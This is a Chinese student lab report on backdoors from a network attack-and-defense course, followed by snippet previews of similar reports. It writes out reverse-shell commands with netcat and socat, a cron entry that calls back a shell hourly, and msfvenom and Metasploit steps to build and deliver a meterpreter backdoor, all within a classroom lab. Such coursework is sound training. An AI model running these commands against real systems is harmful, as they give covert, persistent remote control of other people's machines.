#20155235《网络攻防》实验二后门原理与实践(代码片段)

陨璟 陨璟     2022-10-30     525

关键词:

20155235 《网络攻防》 实验二 后门原理与实践

实验目的

建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
优盘里带有有后门的文件,插到电脑上把文件移到电脑中。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:网页上的相关链接
Linux:实验中用到的ncat等
(3)Meterpreter有哪些给你映像深刻的功能?
画图
(4)如何发现自己有系统有没有被安装后门?
定时查看端口有无可疑的连接吧

实验一 NC 或 netcat

任务一 Windows获得Linux Shell

步骤1:在Windows系统使用ipconfig指令查看本机IP;使用ncat.exe程序监听本机的5235端口
步骤2:在Kali系统中使用nc指令的-e选项反向连接Windows主机的5235端口
步骤3:在Windows下成功运行Kali的shell,运行ls指令后,整体截图如下

任务二 Linux获得Windows Shell

实验过程中出现了一些小问题:

任务三使用nc传输数据

步骤1:在Windows下监听5235端口
步骤2:在Kali下连接到Windows的5235端口:
步骤3:建立之后进行文字传输,后面会用来传输后门

任务四使用netcat获取主机操作Shell

步骤1:在Windows系统下监听5235端口。
步骤2:在kali下用crontab -e指令编辑一条定时任务,选择编辑器时选择3 basic vim编辑器。
步骤3:在最后一行添加 15 * * * * /bin/netcat 169.254.1.140 5235 -e /bin/sh ,即在每个小时的第15分钟反向连接Windows主机的5235端口。

任务五使用socat获取主机操作Shell

步骤1:在Windows系统下,打开控制面板下搜索任务计划开始创建任务,填写任务名称后,新建一个触发器
步骤2:在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写 tcp-listen:5235 exec:cmd.exe,pty,stderr ,这个命令的作用是把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上,创建好后,直接运行
步骤3:此时,在Kali环境下输入指令socat - tcp:192.168.1.104:5216,这里的第一个参数-代表标准的输入输出,使第二个流连接到Windows主机的5216端口,此时可以发现已经成功获得了一个cmd shell:

任务六使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

步骤1:输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.43 LPORT=5235 -f exe > 20155235_backdoor.exe 生成后门程序。

步骤2:通过nc指令将生成的后门程序传送到Windows主机上。
在kali端使用命令: nc 192.168.43.43 5235 < 20155235_backdoor.exe 传送程序。
在windows端使用命令: ncat.exe -l 5235 > 20155235_backdoor.exe 接受程序。
步骤3:在Kali上使用 msfconsole 指令进入msf控制台,输入命令 use exploit/multi/handler 使用监听模块,使用命令 set payload windows/meterpreter/reverse_tcp 设置payload,设置反弹回连的IP(kali的IP)和端口:



目前我就卡在了这一步,按照教程,后面的那两条怎么也不出来,现在还没有解决办法

20155220网络攻防技术实验三免杀原理与实践(代码片段)

网络攻防技术实验三免杀原理与实践使用msf生成后门程序的检测首先我们对上次实验生成的后门exe,利用VirSCAN进行检测然后我们利用msfvenom-pjava/meterpreter/reverse_tcplhost=192.168.150.138(kaliip)lport=5220x>5220_backjar.jar,生成jar文件,... 查看详情

20155321《网络攻防》exp2后门原理与实践(代码片段)

20155321《网络攻防》Exp2后门原理与实践实验内容例举你能想到的一个后门进入到你系统中的可能方式?我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站本身可能被黑客植入了木马程序,这些程序可... 查看详情

2017-2018-220155231《网络对抗技术》实验二:后门原理与实践(代码片段)

2017-2018-220155231《网络对抗技术》实验二:后门原理与实践常用后门工具一、Windows获得Linux的Shell在本机cmd中使用ipconfig获得windows的IP地址1.windows打开监听2.Linux反弹连接winnc(主机ip)5231(所设置的端口)-e/bin/sh3.windows下获得一个linuxshel... 查看详情

20154307《网络对抗技术》实验二后门原理与实践(代码片段)

20154307《网络对抗技术》实验二后门原理与实践一、基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?答:下载盗版软件或者盗版电影的时候。(2)例举你知道的后门如何启动起来(win及linux)的方式?答:linux的c... 查看详情

2019-2020-2网络对抗技术20174326旦增列错exp2后门原理与实践(代码片段)

 2019-2020-2网络对抗技术20174326旦增列错Exp2后门原理与实践目录一、实验介绍二、实验准备三、实验过程任务一:使用netcat实现windows,linux之间的后门连接任务二:使用socat获取主机操作Shell,任务计划启动任务三:MFSmeterpreter生... 查看详情

2019-2020-220174322童硕《网络对抗技术》exp2后门原理与实践(代码片段)

2019-2020-220174322童硕《网络对抗技术》Exp2后门原理与实践 一、实验内容及预备知识1.实验内容2.基础问题回答 二、常用后门工具实践  任务一:Windows获得LinuxShell  任务二:Linux获得WindowsShell  任务三:使用nc传输数... 查看详情

20165223《网络对抗技术》exp2后门原理与实践(代码片段)

目录——后门原理与实践后门原理与实践说明实验任务基础知识问答常用后门工具实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计划启动任务三:使用MSFmeterpreter生成可执行文件... 查看详情

20154329《网络对抗技术》后门原理与实践

#Exp2后门原理与实践 ##实验准备 1.知识储备 关于netcat:    又名nc,ncat.是一个底层工具,进行基本的TCPUDP数据收发。常被与其他工具结合使用,起到后门的作用。2.f附件准备 在课程主页下载附件ncat.exe... 查看详情

2019-2020-220174319安睿韬《网络对抗技术》exp2后门原理与实践(代码片段)

目录 一.实验内容明及预备知识1、基础知识2、实验内容二.软件下载及功能测试任务一:Windows获得LinuxShell任务二:Linux获得WindowsShell任务三:使用nc传输数据三.Meterpreter四.实验任务任务一:使用netcat获取主机操作Shell,cron启... 查看详情

2018-2019-2网络对抗技术20165318exp2后门原理与实践(代码片段)

2018-2019-2网络对抗技术20165318Exp2后门原理与实践后门的基本概念及实验内容常用后门工具netcatWin获得LinuxShellLinux获得WinShellMeterpreter实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计... 查看详情

20145306《网络攻防》后门原理与应用

20145306《网络攻防》后门原理及其应用后门原理后门就是不经过正常认证流程而访问系统的通道。实现后门攻击首先是要有一个后门程序,然后将程序放入目标的操作系统上,然后让其运行起来,还需要不被恶意代码的检测程序... 查看详情

2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)

目录2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1.基础知识总结2.实验内容任务一任务二任务三任务四任务五3.问题与解决4.基础问题回答5.实验总结与体会2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1... 查看详情

2018-2019-2网络对抗技术20165236exp2后门原理与实践

2018-2019-2网络对抗技术20165236Exp2后门原理与实践 一、实验内容(3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell,任务计划启动(0.5分) (3)使用MSFmeterpreter(或其他软件)生成可... 查看详情

20155305《网络对抗》后门原理与实践(代码片段)

20155305《网络对抗》后门原理与实践实验过程(基本后门工具实践)1、Win获取Linuxshell(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。(2)Win下载老师的下载地址比较方便、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe-l-p5305命... 查看详情

20145311王亦徐《网络对抗技术》后门原理与实践

20145311王亦徐《网络对抗技术》后门原理与实践实验内容使用netcat、socat获取主机操作Shell,并分别设置cron启动与任务计划启动使用MSFmeterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音... 查看详情

2018-2019-220165205网络攻防exp3免杀原理与实践(代码片段)

2018-2019-220165205网络攻防Exp3免杀原理与实践一、实践内容1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程1.1.1正确使用msf编码器尝试用msf编码器对后门程序进行多次编码,尝试降低被... 查看详情

exp2后门原理与实践20154317

        实验二:后门原理与实践实验要求:使用netcat获取主机操作Shell,cron启动。使用socat获取主机操作Shell,任务计划启动。使用MSFmeterpreter生成可执行文件,利用ncat或socat传送到主机使用MSFmeterpreter... 查看详情

20165324何春江网络对抗技术exp:2后门原理与实践(代码片段)

20165324何春江网络对抗技术Exp:2后门原理与实践课程学习:后门后门:是不经过正常认证流程而访问系统的通道,存在与编译器、操作系统、固件和应用中等等。后门工作流程:程序→植入→运行→免杀。后门工具:NC(netcat)... 查看详情